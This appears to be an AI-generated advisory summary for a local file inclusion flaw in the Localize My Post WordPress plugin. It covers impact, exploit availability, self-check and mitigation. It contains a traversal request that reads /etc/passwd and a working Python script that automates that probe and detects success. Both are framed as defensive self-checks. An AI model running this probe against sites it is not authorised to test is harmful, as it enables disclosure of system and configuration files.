This is a summary of the AI-generated 10-question deep analysis.
Q1. What is this vulnerability? (Essence + Consequences)
**Essence**: A path traversal / local file inclusion (LFI) flaw in the 'Localize My Post' WordPress plugin. …
**Root Cause**: The plugin's `ajax/include.php` script passes the user-supplied `file` parameter to a file inclusion without filtering it. **CWE**: Improper input validation that lets directory traversal sequences (`../`) reach files outside the intended directory.
Q3. Who is affected? (Versions/Components)
**Affected**: WordPress sites running the **Localize My Post** plugin. **Version**: Version 1.0. **Platform**: PHP/MySQL-based WordPress installations.
Q4. What can attackers do? (Privileges/Data)
**Capabilities**: An unauthenticated attacker can read arbitrary files that the web server process can access. **Impact**: Disclosure of sensitive configuration files and source code, and potentially code execution when combined with another vector: because the target is included rather than merely read, any PHP contained in an attacker-influenced file (such as a log or an upload) executes. …
**Threshold**: Low. **Config**: No authentication is required to reach the vulnerable `ajax/include.php` endpoint. **Access**: The script is publicly reachable over the web, so exploitation is remote and trivial.
Q6. Is there a public exploit? (PoC/Wild exploitation)
**Exploit**: Yes. **Sources**: Public exploits are available on Exploit-DB (ID 45439) and PacketStorm. **PoC**: A Nuclei template and mailing-list disclosures also exist, so the flaw is trivially scannable at scale; these are proof-of-concept material rather than confirmed reports of in-the-wild attacks.
Q7. How to self-check? (Features/Scanning)
**Check**: Enumerate installed plugins for `Localize My Post` (the directory `wp-content/plugins/localize-my-post/` will be present). **Test**: Request `wp-content/plugins/localize-my-post/ajax/include.php?file=../../etc/passwd` (or an equivalent system file) and look for the file's contents in the response. The traversal is resolved relative to the `ajax/` directory, which sits several levels below the filesystem root, so two `../` segments are usually not enough; add segments until the file appears (segments past `/` are harmless). …
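As an added example (not code from this page, the plugin, or the Exploit-DB entry), the following Python script automates the self-check above: it builds the probe URL for the endpoint path quoted in the text with an increasing number of `../` segments, classifies each response, and stops at the first decisive verdict. The `/etc/passwd` signature, the mapping of HTTP status codes to verdicts, and the offline `demo_fetch` stand-in (which assumes the `ajax/` directory is about seven levels below `/`) are assumptions for illustration; point `self_check` only at sites you are authorised to test.

```python
"""Self-check for the Localize My Post LFI (added example, not the plugin's code).

Assumptions (not from the advisory): the /etc/passwd marker used to confirm
a read, the status-code mapping in classify(), and the depth used by demo_fetch().
"""
import re
import urllib.error
import urllib.request
from urllib.parse import urlencode, urljoin

# Endpoint path exactly as quoted in the advisory text.
ENDPOINT = "wp-content/plugins/localize-my-post/ajax/include.php"

# /etc/passwd begins with the root entry; matching on it avoids false
# positives from pages that merely echo the request parameter back.
PASSWD_RE = re.compile(r"^root:[^:]*:0:0:", re.M)


def probe_url(site: str, depth: int, target: str = "etc/passwd") -> str:
    """Build the probe URL with `depth` '../' segments in front of `target`."""
    traversal = "../" * depth + target
    base = urljoin(site.rstrip("/") + "/", ENDPOINT)
    return base + "?" + urlencode({"file": traversal})


def classify(status: int, body: str) -> str:
    """Map one HTTP response onto a verdict (status mapping is an assumption)."""
    if status == 404:
        return "plugin-absent"      # endpoint not there: plugin missing or removed
    if status in (401, 403):
        return "blocked"            # a WAF / .htaccess mitigation is in place
    if PASSWD_RE.search(body):
        return "vulnerable"         # the included file's contents came back
    return "inconclusive"           # wrong depth, or the file is not readable


def fetch(url: str, timeout: float = 10.0):
    """Real fetcher: return (status, body), treating HTTP error pages as responses."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def self_check(site: str, max_depth: int = 12, fetcher=fetch):
    """Probe with 2..max_depth traversal segments; stop at the first decisive verdict.

    Returns (verdict, depth); depth is None when nothing decisive was seen.
    Segments past '/' are ignored by the filesystem, so one large depth would
    also work, but stepping reveals the minimal depth for the report.
    """
    for depth in range(2, max_depth + 1):
        status, body = fetcher(probe_url(site, depth))
        verdict = classify(status, body)
        if verdict != "inconclusive":
            return verdict, depth
    return "inconclusive", None


# Constructed offline stand-in for fetch(): pretends the ajax/ directory is
# seven levels below / (e.g. /var/www/html/wp-content/plugins/localize-my-post/ajax),
# so fewer than seven '../' segments include a file that does not exist.
def demo_fetch(url: str):
    depth = url.count("..%2F")
    if depth >= 7:
        return 200, ("root:x:0:0:root:/root:/bin/bash\n"
                     "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
    return 200, ""


if __name__ == "__main__":
    # Offline demonstration against the constructed fetcher.
    print(self_check("https://blog.example", fetcher=demo_fetch))
```

Swap `demo_fetch` for the default `fetch` to run the probe for real; a `blocked` verdict after applying an `.htaccess` or WAF rule is the confirmation that the mitigation actually covers the endpoint.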
**Fix**: Update the plugin to a patched version if one is available. **Action**: If no patch exists, note that the vendor repository (GitHub issues) suggests the plugin may be abandoned; treat it as unpatchable, or review and fix the inclusion code yourself. …
**Workaround**: Disable or uninstall the 'Localize My Post' plugin immediately. **Mitigation**: If the plugin is business-critical but unpatchable, block access to `ajax/include.php` with WAF rules or `.htaccess`, then repeat the self-check request to confirm it is denied. …
**Priority**: High. **Age**: Published in 2018, but LFI remains a critical class of flaw. **Urgency**: Act immediately if the vulnerable plugin is active. …